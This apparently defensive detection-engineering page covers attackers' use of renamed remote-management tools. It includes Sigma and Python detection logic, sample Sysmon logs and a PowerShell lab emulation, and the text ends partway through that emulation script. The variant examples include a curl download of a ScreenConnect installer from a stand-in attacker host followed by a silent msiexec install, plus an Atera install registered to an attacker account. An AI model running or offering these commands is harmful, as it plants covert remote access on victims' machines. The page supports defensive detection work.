Renamed RMM Tools

Initial Access Command and Control T1219.002 Detection difficulty: MEDIUM Prevalence: HIGH

Legitimate remote monitoring and management (RMM) tools are renamed or masqueraded to appear as trusted files (tax documents, invoices, IT support tools) and delivered via browser download. Once executed, the RMM client establishes persistent command-and-control to attacker infrastructure while appearing to be a signed, legitimate binary. Because the binary is legitimately signed by the vendor, many security tools will not flag it. The chokepoints are the browser download, the file masquerade, user execution, and the outbound connection to RMM infrastructure, all of which are required regardless of which RMM tool is used.

Attack Chokepoints 3 invariant stages

Each stage is an invariant condition the attacker must satisfy, regardless of tool, variant, or threat actor. Detection at any stage breaks the chain.

1 Browser Download
  • User account can execute binaries from browser download paths (Downloads, Temp, AppData)
  • RMM binary carries a valid vendor code-signing certificate, so signer- and reputation-based controls treat it as trusted; matching the file hash against known RMM builds still works (see Observable below)
Input User clicks a link or is directed to download a file from an attacker-controlled or compromised site
Chokepoint Browser process creates an executable in a user-writable path (Downloads, Temp, AppData) with a campaign-themed or generic filename masking RMM software
Observable Sysmon EID 11 showing browser process (chrome.exe, msedge.exe) writing an executable to Downloads/Temp. File hash matches a known RMM tool despite the campaign-themed filename.
Why unavoidable
The binary must land on disk before execution. No in-memory-only path exists for the initial delivery of a standalone RMM installer; the file must be hosted on an attacker-controlled or compromised site reachable by the victim's browser, so delivery cannot be skipped in any variant, including TOAD (telephone-oriented attack delivery), where a caller walks the victim through the download
  • Sysmon Event ID 11 (File Creation)
  • Browser download telemetry
Output RMM binary exists on disk with a masqueraded filename
2 User Execution
Input RMM binary exists on disk with a masqueraded filename
Chokepoint User executes the downloaded binary, which is a legitimately-signed RMM tool regardless of its filename. PE metadata (OriginalFilename, Company) betrays the mismatch
Observable Sysmon EID 1 showing process creation where the Image filename differs from the PE OriginalFilename metadata. For example: Image=tax_form.exe but OriginalFilename=AnyDesk.exe, or Company=AnyDesk Software GmbH (philandro Software GmbH on older builds).
Why unavoidable
The binary must execute to establish C2. No execution means no remote access regardless of delivery success
  • Sysmon Event ID 1 (Process Creation)
  • Windows Security Event ID 4688 (Process Creation)
Bypass risk: exploitation of internet-exposed RMM servers (ScreenConnect CVE-2024-1709, SimpleHelp CVE-2024-57727) skips this stage entirely; no user runs a binary, so user-execution detection never fires. Monitor RMM server process telemetry separately
Output RMM process is running on the endpoint
3 Outbound RMM Connection
Input RMM process is running on the endpoint
Chokepoint Executed binary establishes a persistent connection to RMM relay or attacker-controlled server on standard HTTPS ports
Observable Sysmon EID 3 showing outbound HTTPS connection from a process whose Image path is in a user-writable directory to known RMM relay domains or self-hosted infrastructure.
Why unavoidable
The C2 channel must be established. The entire purpose of RMM tool deployment is persistent remote access
  • Sysmon Event ID 3 (Network Connection)
  • Firewall / proxy egress logs
Bypass risk: Self-hosted RMM infrastructure (RustDesk, MeshCentral) makes domain-based blocking ineffective. Detect by behavior (browser download + execution + outbound), not by destination
Output Persistent C2 channel from the endpoint to attacker-controlled RMM infrastructure; chain complete

Variations 9 variants tracked

Tools and methods that exploit this chokepoint. The list grows. The chokepoint doesn't change.

AnyDesk 2020 Declining
Common masquerade names: invoice.exe, tax_form.exe, SSN_verification.exe; February 2024 production server breach resulted in source code and code signing certificate theft. Certificate revoked, driving threat actor migration to other tools
Most common renamed RMM in 2023-2024. Filename-to-metadata mismatch is the detection signal. AnyDesk code signing cert stolen and revoked February 2024.
# User downloads "Invoice_2024.exe" via browser
# PE metadata reveals: OriginalFilename = "AnyDesk.exe", Company = "AnyDesk Software GmbH"
# Execution establishes C2 to *.net.anydesk.com relay
# Attacker's AnyDesk ID connects to victim's session
  • Sysmon EID 11: Executable written to Downloads/Temp by browser process
  • Sysmon EID 1: Process where Image filename differs from OriginalFilename in PE header
  • Sysmon EID 3: Outbound to *.net.anydesk.com on 443/6568
  • Sysmon EID 13: AnyDesk registry keys created despite different filename
Same chokepoint: Browser download → renamed binary execution (filename differs from PE metadata) → outbound to AnyDesk relay
Source: www.cisa.gov →
TeamViewer 2019 Active
Common masquerade names: update.exe, system_check.exe
One of earliest RMM tools abused for C2 (since 2019). Often delivered as IT support tool during TOAD social engineering calls.
# User downloads "Meeting_Link.exe" or "Support_Tool.exe"
# PE metadata: OriginalFilename = "TeamViewer.exe", Company = "TeamViewer Germany GmbH"
# Establishes connection to *.teamviewer.com relay
  • Sysmon EID 11: Executable downloaded by browser with non-TeamViewer name
  • Sysmon EID 1: Process where filename differs from TeamViewer PE metadata
  • Sysmon EID 3: Outbound to *.teamviewer.com
Same chokepoint: Browser download → renamed TeamViewer execution → outbound to teamviewer.com relay
Source: www.proofpoint.com →
ScreenConnect (ConnectWise) 2022 Active
Common masquerade names: support_tool.exe, IT_access.exe; now primary choice for renamed-binary delivery; February 2024 CVE-2024-1709 (auth bypass) + CVE-2024-1708 (path traversal) enabled direct server exploitation by LockBit, Black Basta, and Bl00dy. 18,188 exposed instances globally at time of disclosure; dual vector: user-delivered binary AND direct server exploitation
Primary RMM in campaign use since 2022. CISA AA23-025A. CVE-2024-1709 (auth bypass) enabled direct exploitation of 18,000+ exposed instances.
# User downloads "SecurityUpdate.exe" or "TaxForm_2024.msi"
# MSI installs ScreenConnect client silently
# Connects to attacker-controlled instance:
#   hxxps[://]attacker-instance[.]screenconnect[.]com
# or self-hosted: hxxps[://]attacker-server[.]com:8040
  • Sysmon EID 11: MSI/EXE downloaded by browser with campaign-themed name
  • Sysmon EID 1: ScreenConnect.ClientService.exe process creation after the MSI install
  • Sysmon EID 3: Outbound HTTPS to *.screenconnect.com or non-standard port
  • Windows System EID 7045: ScreenConnect service installed
Same chokepoint: Browser download → MSI/EXE install → ScreenConnect service created → HTTPS C2 to attacker instance
Source: unit42.paloaltonetworks.com →
UltraViewer 2023 Active
Common masquerade names: security_scan.exe, verify.exe
Adopted to evade AnyDesk-specific detections. Less monitored by security tools due to lower market share.
# User downloads "Document_Viewer.exe"
# PE metadata: OriginalFilename = "UltraViewer.exe"
# Connects to UltraViewer relay infrastructure
  • Sysmon EID 11: Executable with non-UltraViewer filename
  • Sysmon EID 1: Process with UltraViewer PE metadata from Downloads/Temp
  • Sysmon EID 3: Outbound to UltraViewer relay
Same chokepoint: Browser download → renamed UltraViewer execution → outbound to UltraViewer relay
Source: www.seqrite.com →
RustDesk 2023 Active
Open-source; self-hosted infrastructure makes domain blocking ineffective; first documented in Akira ransomware and Scattered Spider operations mid-2023; broader adoption through 2024
Self-hosted = domain/IP blocking ineffective. Adopted by Akira and Scattered Spider. Detection must be behavioral, not domain-based.
# Open-source self-hosted RMM — no vendor relay to block
# Attacker runs their own RustDesk server
# Victim downloads renamed rustdesk.exe
# Config points to the attacker's ID/relay server: attacker-relay[.]com:21116 (ID server) and :21117 (relay); RustDesk's own protocol, not HTTPS
  • Sysmon EID 11: rustdesk.exe written with non-standard filename
  • Sysmon EID 1: Process with RustDesk PE metadata from unexpected path
  • Sysmon EID 3: Outbound to non-standard IP on port 21116/21117
Same chokepoint: Browser download → renamed rustdesk.exe execution → outbound to self-hosted relay (no vendor domain to block)
Source: asec.ahnlab.com →
SimpleHelp 2025-Q1 Active
CVE-2024-57727 (path traversal), CVE-2024-57726 (privilege escalation), CVE-2024-57728 (arbitrary file upload) disclosed January 2025; exploited in the wild since January 22, 2025 as ransomware initial access vector; DragonForce deployed via it; CISA advisory AA25-163A issued June 2025; CISA KEV listed February 2025
Three critical CVEs (Jan 2025) enabled exploitation of 18,000+ exposed instances. Both social engineering AND server-side paths. Used by DragonForce for ransomware.
# Two attack paths:
# Path 1: Renamed binary (social engineering) — PE metadata mismatch
# Path 2: CVE exploitation (server-side):
# CVE-2024-57727 (path traversal) + CVE-2024-57726 (privesc) + CVE-2024-57728 (arbitrary file upload leading to RCE)
  • Path 1: Same as other renamed RMM (PE metadata mismatch)
  • Path 2: SimpleHelp server logs showing exploitation
  • Sysmon EID 3: Outbound from SimpleHelp client to attacker instance
Same chokepoint: Social engineering delivery OR CVE exploitation → SimpleHelp session → attacker remote access
Source: www.cisa.gov →
NetSupport Manager 2019 Active
Long-abused RMM (the 'NetSupport RAT' name derives from this tool); TA571 and the ClearFake cluster began ClickFix clipboard delivery specifically in March 2024; remains one of the most common RMM payloads in commodity phishing operations through 2025
Legitimate remote support tool abused since 2019. Config file (client32.ini) points to attacker gateway. Often delivered via ClickFix campaigns.
# Drops NetSupport client files to AppData or ProgramData:
# client32.exe + client32.ini (attacker gateway config)
# client32.ini contains (GatewayAddress is host:port, not a URL):
# [HTTP]
# GatewayAddress=attacker-gateway[.]com:443
  • Sysmon EID 11: client32.exe + client32.ini written to AppData/ProgramData
  • Sysmon EID 1: client32.exe running from non-standard path
  • Sysmon EID 3: Outbound to attacker gateway (not official NetSupport infra)
Same chokepoint: Payload delivery → client32.exe + ini deployed → NetSupport connects to attacker gateway
Source: www.esentire.com →
Atera 2022 Active
Used by MuddyWater (Iran/TA450) in nation-state campaigns since mid-2022; intense campaign wave October 2023–April 2024 targeting Israeli manufacturing, tech, and infosec sectors; also deployed post-compromise as secondary RMM after ScreenConnect CVE-2024-1709 exploitation in European targets
Cloud-based RMM. MSI registers agent to attacker Atera account. Uses legitimate Atera cloud; domain blocking difficult.
msiexec /i AteraSetup.msi /qn INTEGRATORLOGIN=attacker@email.com ACCOUNTID=<attacker_account>
# Silent install, agent registers to attacker's Atera account
  • Sysmon EID 1: msiexec.exe with /qn flag installing Atera MSI
  • Sysmon EID 11: AteraAgent.exe written to disk by the MSI install
  • Sysmon EID 3: Outbound to *.atera.com
Same chokepoint: MSI delivery → silent install → Atera agent registers to attacker account → cloud C2
Source: harfanglab.io →
RMM-to-RMM Deployment 2024 Active
One RMM (e.g., ScreenConnect) deploys a second RMM (e.g., AnyDesk) for redundancy. If one is removed, the other maintains access
Pattern emerged 2024-H2. First RMM deploys second for redundancy. Documented in Hunters International campaigns (AnyDesk + ScreenConnect simultaneously).
# First RMM deploys second as backup persistence:
cmd /c curl -o C:\Temp\ScreenConnect.msi hxxps[://]attacker-instance[.]screenconnect[.]com/Bin/ConnectWiseControl.ClientSetup.msi
msiexec /i C:\Temp\ScreenConnect.msi /qn
  • Sysmon EID 1: RMM process spawning cmd.exe → curl → msiexec
  • Sysmon EID 11: Second RMM installer written to disk
  • Sysmon EID 3: Two simultaneous outbound RMM connections to different relays
Same chokepoint: First RMM established → downloads second RMM → silent install → dual C2 channels
Source: www.microsoft.com →
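The RMM-to-RMM pattern above is visible in process ancestry rather than in any single process name. The following is an added example for this page, not the project's own rule code: it rebuilds a process tree from Sysmon EID 1 records, flags curl/msiexec whose ancestors lead back to an RMM client (matching renamed copies through OriginalFileName), and separately reports two different RMM tools holding outbound connections at the same time. All events, ProcessGuid values, install paths and the attacker hostname are constructed to mirror the AnyDesk → cmd → curl/msiexec → ScreenConnect chain described above.

```python
"""Detect one RMM client deploying a second one (the RMM-to-RMM pattern above).

Added example for this page, not the project's code. It builds a process tree from
Sysmon EID 1 records and flags download/install tools whose ancestry leads back to
an RMM client, and separately reports two different RMM tools talking out at once.
Events, paths, GUIDs and the attacker hostname below are constructed.
"""
import ntpath

# Client binaries named on this page; extend from your approved-tool inventory.
RMM_CLIENTS = {"anydesk.exe": "AnyDesk", "screenconnect.clientservice.exe": "ScreenConnect",
               "teamviewer.exe": "TeamViewer", "ultraviewer.exe": "UltraViewer",
               "rustdesk.exe": "RustDesk", "client32.exe": "NetSupport",
               "ateraagent.exe": "Atera", "meshagent.exe": "MeshCentral"}
STAGERS = {"curl.exe", "msiexec.exe"}      # download + silent-install tools from the chain above

def _base(path):
    return ntpath.basename(path).lower()

def rmm_tool(ev):
    """Identify an RMM client by image name, falling back to PE OriginalFileName for renamed copies."""
    return RMM_CLIENTS.get(_base(ev["Image"])) or RMM_CLIENTS.get((ev.get("OriginalFileName") or "").lower())

def rmm_ancestor(procs, guid, max_depth=8):
    """Walk ParentProcessGuid links upward; return (tool, image) of the nearest RMM
    client ancestor, or None. max_depth guards against missing or cyclic links."""
    cur = procs.get(guid)
    for _ in range(max_depth):
        parent = procs.get(cur.get("ParentProcessGuid")) if cur else None
        if parent is None:
            return None
        tool = rmm_tool(parent)
        if tool:
            return tool, parent["Image"]
        cur = parent
    return None

def detect_rmm_to_rmm(events):
    procs = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    findings = []
    for proc in procs.values():                            # signal 1: RMM client -> stager ancestry
        if _base(proc["Image"]) not in STAGERS:
            continue
        hit = rmm_ancestor(procs, proc["ProcessGuid"])
        if hit:
            cmd = proc.get("CommandLine", "")
            findings.append({"type": "rmm_spawned_stager", "via": hit[0], "ancestor": hit[1],
                             "process": _base(proc["Image"]), "command": cmd,
                             "quiet_install": "/qn" in cmd.lower() or "/quiet" in cmd.lower()})
    active = {}                                            # signal 2: two RMM tools with live C2
    for net in events:
        if net["EventID"] == 3 and net.get("Initiated") and rmm_tool(net):
            active.setdefault(rmm_tool(net), set()).add(net.get("DestinationHostname") or net["DestinationIp"])
    if len(active) >= 2:
        findings.append({"type": "dual_rmm_c2", "tools": sorted(active),
                         "destinations": {t: sorted(d) for t, d in active.items()}})
    return findings

def _p(guid, parent, image, cmd=""):
    return {"EventID": 1, "ProcessGuid": guid, "ParentProcessGuid": parent, "Image": image, "CommandLine": cmd}

def _n(guid, image, host):
    return {"EventID": 3, "ProcessGuid": guid, "Image": image, "Initiated": True,
            "DestinationIp": "203.0.113.20", "DestinationHostname": host, "DestinationPort": 443}

# Constructed sample: the first RMM (AnyDesk) pulls and silently installs ScreenConnect.
ANYDESK = r"C:\Users\jsmith\AppData\Roaming\AnyDesk\AnyDesk.exe"
SC_SVC = r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3)\ScreenConnect.ClientService.exe"
SC_URL = "https://attacker-instance.screenconnect.com/Bin/ConnectWiseControl.ClientSetup.msi"
SAMPLE_EVENTS = [
    _p("{a}", "{explorer}", ANYDESK),
    _p("{c1}", "{a}", r"C:\Windows\System32\cmd.exe", rf"cmd /c curl -o C:\Temp\ScreenConnect.msi {SC_URL}"),
    _p("{u}", "{c1}", r"C:\Windows\System32\curl.exe", rf"curl -o C:\Temp\ScreenConnect.msi {SC_URL}"),
    _p("{c2}", "{a}", r"C:\Windows\System32\cmd.exe", r"cmd /c msiexec /i C:\Temp\ScreenConnect.msi /qn"),
    _p("{m}", "{c2}", r"C:\Windows\System32\msiexec.exe", r"msiexec /i C:\Temp\ScreenConnect.msi /qn"),
    _p("{s}", "{services}", SC_SVC),                       # service start: parent is outside the tree
    _p("{m2}", "{explorer}", r"C:\Windows\System32\msiexec.exe", r"msiexec /i C:\Users\jsmith\Downloads\tool.msi"),
    _n("{a}", ANYDESK, "relay.anydesk.com"),
    _n("{s}", SC_SVC, "attacker-instance.screenconnect.com"),
]

if __name__ == "__main__":
    for finding in detect_rmm_to_rmm(SAMPLE_EVENTS):
        print(finding)
```

Helpdesk staff legitimately push software through an RMM, so the ancestry signal alone is a hunt lead, not an alert: raise it to alert quality by requiring the msiexec command line or the dropped file to name a second RMM installer, or by pairing it with the dual-connection signal, which has far fewer benign explanations.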

Detection Strategy

Rules organized by the chokepoint stage they detect. Each stage has one or more rules at different maturity levels.

1 Browser Download
2 User Execution
3 Outbound RMM Connection
Identify all RMM tool processes running in the environment
Research High FP
Goal
Identify all RMM tool processes running in the environment
Log Sources
  • Sysmon Event ID 1 (Process Creation)
  • Windows Security Event ID 4688 (Process Creation)
  • Application inventory / software management telemetry
FP Rate
High
Use Case
Asset inventory; baseline of legitimate RMM usage by IT staff
Process name matches known RMM binaries: anydesk.exe, screenconnect*.exe, teamviewer*.exe, ultraviewer.exe, rustdesk.exe, meshagent.exe, connectwisecontrol*.exe.
Sigma Rule — Research Level
title: Known RMM Tool Process Execution
id: b8c2d4e6-f8a0-4b2c-9d3e-5f7a9b1c3d5e
status: experimental
description: >
  Detects execution of known RMM tool processes by image name or by PE OriginalFileName
  (the latter catches renamed copies). Baseline rule for mapping approved vs. unapproved
  RMM usage across the environment.
references:
  - https://attack.mitre.org/techniques/T1219/
  - https://attack.mitre.org/techniques/T1219/002/
author: "@iimp0ster"
date: 2025-01-15
tags:
  - attack.initial_access
  - attack.command_and_control
  - attack.t1219.002
  - detection.maturity.research
logsource:
  category: process_creation
  product: windows
detection:
  # Sigma string matching is case-insensitive, so one spelling per name is enough.
  # Each selection below is a separate OR branch: keys inside one map are ANDed, so
  # putting Image|endswith and Image|contains in the same map would never match.
  selection_image:
    Image|endswith:
      - '\anydesk.exe'
      - '\teamviewer.exe'
      - '\ultraviewer.exe'
      - '\rustdesk.exe'
      - '\meshagent.exe'
  selection_screenconnect:
    Image|contains:
      - '\ScreenConnect.'
      - '\connectwisecontrol'
  selection_original_name:
    # Renamed binaries keep the vendor's OriginalFileName (see Variations above);
    # add further vendors after checking their PE version resource
    OriginalFileName:
      - 'AnyDesk.exe'
      - 'TeamViewer.exe'
      - 'UltraViewer.exe'
  filter_legit_software:
    # Tune for your environment: add approved install paths or binaries that trigger this rule
    Image|endswith:
      - '\placeholder_tune_for_your_env.exe'
  condition: 1 of selection_* and not filter_legit_software
falsepositives:
  - Legitimate IT helpdesk use of RMM tools
  - Authorized remote support sessions
  - Security testing environments
level: informational

Raw Log Samples 3 samples

Real-world log events produced by this technique and which Sigma rules they trigger.

EID 11 Sysmon Renamed RMM binary dropped to Downloads folder by browser process
EventID: 11 (FileCreate)
UtcTime: 2024-10-15 09:34:12.881
ProcessGuid: {c3d4e5f6-3456-7890-cdef-012345678901}
ProcessId: 3284
Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
TargetFilename: C:\Users\jsmith\Downloads\tax-document-2024.exe
CreationUtcTime: 2024-10-15 09:34:12.881
# Browser drops .exe directly to Downloads. Combined with execution signals in the Hunt/Analyst rules
EID 1 Sysmon Renamed RMM binary executed. OriginalFilename mismatch is the Analyst signal
EventID: 1 (Process Create)
UtcTime: 2024-10-15 09:34:28.103
ProcessGuid: {c3d4e5f6-3456-7890-cdef-012345678902}
ProcessId: 9876
Image: C:\Users\jsmith\Downloads\tax-document-2024.exe
OriginalFileName: AnyDesk.exe
CommandLine: "C:\Users\jsmith\Downloads\tax-document-2024.exe"
CurrentDirectory: C:\Users\jsmith\Downloads\
ParentProcessId: 3284
ParentImage: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
FileVersion: 8.0.8.0
Description: AnyDesk
Company: AnyDesk Software GmbH
# KEY SIGNAL: Image=tax-document-2024.exe but OriginalFileName=AnyDesk.exe
# File signer: AnyDesk Software GmbH certificate on a file named "tax-document-2024.exe"
EID 3 Sysmon Renamed AnyDesk binary connects to AnyDesk relay infrastructure
EventID: 3 (NetworkConnect)
UtcTime: 2024-10-15 09:34:29.441
ProcessGuid: {c3d4e5f6-3456-7890-cdef-012345678902}
ProcessId: 9876
Image: C:\Users\jsmith\Downloads\tax-document-2024.exe
User: CORP\jsmith
Protocol: tcp
Initiated: true
SourceIp: 10.10.5.22
SourcePort: 51876
DestinationIp: 195.201.29.30
DestinationHostname: relay.anydesk.com
DestinationPort: 443
# Non-RMM-named binary connecting to relay.anydesk.com within 2 min of browser download
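The three chokepoint stages, run as one correlation over the kind of events shown in these samples. This is an added example for this page, not the project's own rule code. Event records are constructed inline: the first three mirror the samples above, while the self-hosted RustDesk case, the approved helpdesk case and all ProcessGuid values are made up. The name, domain and port tables come from the Variations section; the 5-minute window, the internal address ranges and the browser list are assumptions to tune. The chain fires on behavior alone (browser drop, Image/OriginalFileName mismatch, outbound from that same process), so a destination with no vendor domain still alerts.

```python
"""Behavioral correlation of the three chokepoints over Sysmon events.

Added example for this page, not the project's rule code. Events are constructed
inline: the first three mirror the samples above; the RustDesk and helpdesk cases
and all ProcessGuid values are made up. The chain fires on behavior alone;
tool attribution is only a label.
"""
from datetime import datetime, timedelta
import ipaddress
import ntpath

BROWSERS = {"chrome.exe", "msedge.exe"}                     # writers named on this page
USER_WRITABLE = ("\\downloads\\", "\\temp\\", "\\appdata\\")
# Assumption: internal ranges to ignore as destinations; tune to your address plan.
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
# Attribution hints from the Variations section; destinations outside these still alert.
RMM_ORIGINAL_NAMES = {"anydesk.exe": "AnyDesk", "teamviewer.exe": "TeamViewer",
                      "ultraviewer.exe": "UltraViewer", "rustdesk.exe": "RustDesk"}
RMM_DOMAINS = {"anydesk.com": "AnyDesk", "teamviewer.com": "TeamViewer",
               "screenconnect.com": "ScreenConnect", "atera.com": "Atera"}
RMM_PORTS = {6568: "AnyDesk", 21116: "RustDesk", 21117: "RustDesk"}

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")

def _base(path):
    return ntpath.basename(path).lower()

def _within(later, earlier, window):
    return timedelta(0) <= _ts(later["UtcTime"]) - _ts(earlier["UtcTime"]) <= window

def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL)

def attribute_destination(ev):
    """Label a destination by vendor relay domain, then by well-known RMM port."""
    host = (ev.get("DestinationHostname") or "").lower()
    for suffix, tool in RMM_DOMAINS.items():
        if host == suffix or host.endswith("." + suffix):
            return tool
    return RMM_PORTS.get(int(ev["DestinationPort"]), "unknown (self-hosted?)")

def correlate_renamed_rmm(events, window=timedelta(minutes=5)):
    """One alert per browser-dropped .exe that runs under a mismatched OriginalFileName
    and then initiates an external connection. MSI drops (ScreenConnect, Atera) need a
    separate msiexec CommandLine correlation and are not covered here."""
    alerts = []
    drops = [e for e in events if e["EventID"] == 11 and _base(e["Image"]) in BROWSERS
             and e["TargetFilename"].lower().endswith(".exe")
             and any(m in e["TargetFilename"].lower() for m in USER_WRITABLE)]
    for drop in drops:                                     # stage 1: browser download
        for proc in events:                                # stage 2: execution, metadata mismatch
            if proc["EventID"] != 1 or proc["Image"].lower() != drop["TargetFilename"].lower():
                continue
            orig = (proc.get("OriginalFileName") or "").lower()
            if not _within(proc, drop, window) or not orig or orig == _base(proc["Image"]):
                continue                                   # too late, or name matches PE metadata
            for net in events:                             # stage 3: outbound from the same process
                if net["EventID"] != 3 or net["ProcessGuid"] != proc["ProcessGuid"]:
                    continue
                if not net.get("Initiated") or not _within(net, proc, window):
                    continue
                if not is_external(net["DestinationIp"]):
                    continue
                dest = net.get("DestinationHostname") or net["DestinationIp"]
                alerts.append({"user": net["User"], "file": proc["Image"],
                               "original_filename": proc["OriginalFileName"],
                               "tool": RMM_ORIGINAL_NAMES.get(orig) or attribute_destination(net),
                               "destination": f'{dest}:{net["DestinationPort"]}', "stages": [11, 1, 3]})
                break
    return alerts

def _ev(eid, when, guid, **fields):
    return {"EventID": eid, "UtcTime": when, "ProcessGuid": guid, **fields}

EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
TAX = r"C:\Users\jsmith\Downloads\tax-document-2024.exe"
INV = r"C:\Users\jsmith\Downloads\Invoice_2024.exe"
HELPDESK_ANYDESK = r"C:\Program Files\AnyDesk\AnyDesk.exe"
SAMPLE_EVENTS = [  # constructed; the first three mirror the samples above
    _ev(11, "2024-10-15 09:34:12.881", "{g-901}", Image=EDGE, TargetFilename=TAX),
    _ev(1, "2024-10-15 09:34:28.103", "{g-902}", Image=TAX, OriginalFileName="AnyDesk.exe"),
    _ev(3, "2024-10-15 09:34:29.441", "{g-902}", Image=TAX, User=r"CORP\jsmith", Initiated=True,
        DestinationIp="195.201.29.30", DestinationHostname="relay.anydesk.com", DestinationPort=443),
    # self-hosted RustDesk: no vendor domain, only the port hints at the tool
    _ev(11, "2024-10-15 11:02:01.000", "{g-903}", Image=CHROME, TargetFilename=INV),
    _ev(1, "2024-10-15 11:02:40.500", "{g-904}", Image=INV, OriginalFileName="rustdesk.exe"),
    _ev(3, "2024-10-15 11:02:41.200", "{g-904}", Image=INV, User=r"CORP\jsmith", Initiated=True,
        DestinationIp="203.0.113.10", DestinationHostname="", DestinationPort=21116),
    # approved helpdesk use: Program Files path, name matches PE metadata, no browser drop
    _ev(1, "2024-10-15 12:00:00.000", "{g-905}", Image=HELPDESK_ANYDESK, OriginalFileName="AnyDesk.exe"),
    _ev(3, "2024-10-15 12:00:01.000", "{g-905}", Image=HELPDESK_ANYDESK, User=r"CORP\helpdesk", Initiated=True,
        DestinationIp="195.201.29.30", DestinationHostname="relay.anydesk.com", DestinationPort=443),
]

if __name__ == "__main__":
    for alert in correlate_renamed_rmm(SAMPLE_EVENTS):
        print(alert)
```

The join on ProcessGuid between EID 1 and EID 3 is what makes this resistant to relay changes: nothing in the chain depends on the destination, and the domain and port tables only decorate the alert. A user who downloads AnyDesk.exe under its own name for an approved session does not trip the chain (no mismatch); that case belongs to the Research inventory rule, not to this one.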

Emulation

ATT&CK: T1219.002 Simulates renamed RMM binary drop, execution with metadata mismatch, and outbound connection
Lab use only. Run in isolated lab VM only. Uses a benign Windows binary renamed to a campaign filename.
POWERSHELL
#Requires -Version 5.1
# MITRE ATT&CK: T1219.002 — Remote Access Tools
# Simulates browser-downloaded RMM binary renamed to a campaign-themed filename.

[CmdletBinding()]
param(
    [string]$CampaignName  = 'tax-document-2024',
    [switch]$CleanupOnly
)

Set-StrictMode -Version Latest
$ErrorActionPreference = 'Stop'

# Use a legitimate signed Windows binary as the "RMM" stand-in for safe emulation.
# In a real engagement, replace this with actual AnyDesk.exe for full fidelity.
$RmmSourceBinary = Join-Path $env:WINDIR 'System32\notepad.exe'
$DownloadsPath   = Join-Path $env:USERPROFILE 'Downloads'
$RenamedBinary   = Join-Path $DownloadsPath "$CampaignName.exe"
$RmmPort         = 443    # AnyDesk relay uses 443/80/6568; use 443 for lab (less likely blocked)
$RmmHost         = 'relay.anydesk.com'

function Write-Step ([string]$Msg) { Write-Host "[*] $Msg" -ForegroundColor Cyan }
function Write-Ok   ([string]$Msg) { Write-Host "[+] $Msg" -ForegroundColor Green }
function Write-Warn ([string]$Msg) { Write-Host "[!] $Msg" -ForegroundColor Yellow }

function Remove-Artefacts {
    if (Test-Path $RenamedBinary) {
        Remove-Item $RenamedBinary -Force -ErrorAction SilentlyContinue
        Write-Ok "Removed: $RenamedBinary"
    }
}

if ($CleanupOnly) { Remove-Artefacts; exit 0 }

Write-Host ""
Write-Host "=== Renamed RMM Tool Emulation ===" -ForegroundColor Magenta
Write-Host "    T1219.002 | Detection Chokepoints Project" -ForegroundColor DarkGray
Write-Host ""

Write-Step "Step 1/3 — Dropping renamed binary to Downloads (browser-download simulation)"
Write-Warn "Note: the copy is made by powershell.exe, so Sysmon EID 11 shows Image=powershell.exe, not a browser; rules that require a browser writer will not fire on this step"
Write-Verbose "  Source binary: $RmmSourceBinary"
Write-Verbose "  Renamed to:    $RenamedBinary"

# Ensure Downloads directory exists
if (-not (Test-Path $DownloadsPath)) {
    New-Item -ItemType Directory -Path $DownloadsPath -Force | Out-Null
}

Copy-Item -Path $RmmSourceBinary -Destination $RenamedBinary -Force
Write-Ok "Binary copied to: $RenamedBinary"
Write-Ok "File name: $CampaignName.exe (social engineering name)"

# Report OriginalFilename vs current name mismatch (the key detection signal)
try {
    $versionInfo = [System.Diagnostics.FileVersionInfo]::GetVersionInfo($RenamedBinary)
    Write-Host ""
    Write-Host "  File metadata (key detection signal):" -ForegroundColor White
    Write-Host "    CurrentName:       $CampaignName.exe" -ForegroundColor DarkGray
    Write-Host "    OriginalFilename:  $($versionInfo.OriginalFilename)" -ForegroundColor DarkGray
    Write-Host "    ProductName:       $($versionInfo.ProductName)" -ForegroundColor DarkGray
    Write-Host "    FileDescription:   $($versionInfo.FileDescription)" -ForegroundColor DarkGray
    if ($versionInfo.OriginalFilename -and $versionInfo.OriginalFilename -ne "$CampaignName.exe") {
        Write-Ok "MISMATCH CONFIRMED: OriginalFilename != current name — Analyst rule will fire"
    }
} catch {
    Write-Warn "Could not read version info: $_"
}

Start-Sleep -Milliseconds 500

Write-Step "Step 2/3 — Executing renamed binary (brief run to generate process telemetry)"
Write-Verbose "  Note: In real scenario, OriginalFilename=AnyDesk.exe vs. CurrentName=$CampaignName.exe"

try {
    # Start notepad briefly then kill it — generates EID 1 with the renamed image path
    $proc = Start-Process -FilePath $RenamedBinary -PassThru -ErrorAction Stop
    Start-Sleep -Milliseconds 800
    if (-not $proc.HasExited) {
        $proc.Kill()
        $proc.WaitForExit(2000) | Out-Null
    }
    Write-Ok "Renamed binary executed (PID $($proc.Id)) and terminated — Sysmon EID 1 generated"
} catch {
    Write-Warn "Binary execution failed: $_"
}

Start-Sleep -Milliseconds 300

Write-Step "Step 3/3 — Outbound connection to RMM relay port (network telemetry)"
Write-Verbose "  Target: $RmmHost`:$RmmPort"
Write-Warn "Note: real AnyDesk connects to relay.anydesk.com:443/80/6568; using TCP connect test only"
Write-Warn "Note: the socket is opened by powershell.exe, so EID 3 carries Image=powershell.exe, not $CampaignName.exe (that process was terminated in Step 2); per-process EID 1 to EID 3 correlation will not link"

try {
    $tcp = New-Object System.Net.Sockets.TcpClient
    $async = $tcp.BeginConnect($RmmHost, $RmmPort, $null, $null)
    $connected = $async.AsyncWaitHandle.WaitOne(5000, $false)
    if ($connected) {
        $tcp.EndConnect($async)
        Write-Ok "TCP connection to $RmmHost`:$RmmPort succeeded — Sysmon EID 3 generated"
    } else {
        Write-Warn "TCP connect timed out (connection attempt still generated EID 3)"
    }
    $tcp.Close()
} catch {
    Write-Warn "Network connection failed (telemetry may still have fired): $_"
}

Write-Host ""
Write-Step "Cleaning up artefacts"
Remove-Artefacts

Write-Host ""
Write-Host "=== Emulation Complete ===" -ForegroundColor Magenta
Write-Host ""
Write-Host "Expected telemetry with the notepad stand-in:" -ForegroundColor White
